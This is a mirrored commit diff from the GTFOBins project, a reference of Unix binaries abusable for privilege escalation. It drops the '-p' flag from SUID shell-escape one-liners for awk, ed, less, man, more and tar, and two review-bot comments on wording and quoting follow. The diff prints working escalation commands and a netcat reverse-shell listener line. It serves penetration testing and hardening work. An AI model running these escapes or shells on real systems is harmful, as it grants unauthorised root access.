mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
Remove the -p option from suid-limited
The option is useless because: - on Debian-like systems the shell does not support it and does not drop privileges anyway; - elsewhere, the `system()`-like function has already gone through a shell that dropped the privileges.
parent
84f48081fb
commit
e885d4a6ee
@ -12,7 +12,7 @@ suid-enabled:
|
|||||||
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
label: Limited SUID
|
label: Limited SUID
|
||||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems (if that's the case don't use the `-p` option).
|
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. This works if the default system shell doesn't drop the SUID privileges, which is usually only valid for Debian Linux systems.
|
||||||
|
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
label: Sudo
|
label: Sudo
|
||||||
|
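Review bot: The revised `suid-limited` description still ties the behaviour to "Debian Linux systems", while the commit message gives the real condition: whether the shell reached through the `system()`-like call drops privileges on its own. Naming a distribution instead of that condition misleads anyone assessing a host where `/bin/sh` resolves to a different shell, and it goes stale if the distribution's default shell changes. Consider wording along the lines of `This only works where the shell invoked by the program does not drop SUID privileges on startup, which is usually only the case on Debian-like systems.` This reading rests on the commit message; the visible lines do not confirm which shells behave this way.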
@ -5,7 +5,7 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
- code: ./awk 'BEGIN {system("/bin/sh")}'
|
||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./ed
|
./ed
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -14,5 +14,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./less /etc/profile
|
./less /etc/profile
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
./man man
|
./man man
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -11,5 +11,5 @@ functions:
|
|||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |-
|
- code: |-
|
||||||
TERM= ./more /etc/profile
|
TERM= ./more /etc/profile
|
||||||
!/bin/sh -p
|
!/bin/sh
|
||||||
---
|
---
|
@ -5,5 +5,5 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh -p"
|
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh"
|
||||||
---
|
---
|
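Review bot: The quotes in `--checkpoint-action=exec="/bin/sh"` on the new `suid-limited` line are left over from the old value, which needed them only because of the space before `-p`. The `sudo-enabled` entry just above writes the same argument unquoted, so `--checkpoint-action=exec=/bin/sh` would keep the two entries consistent. The scalar parses the same either way, so this is purely a readability point.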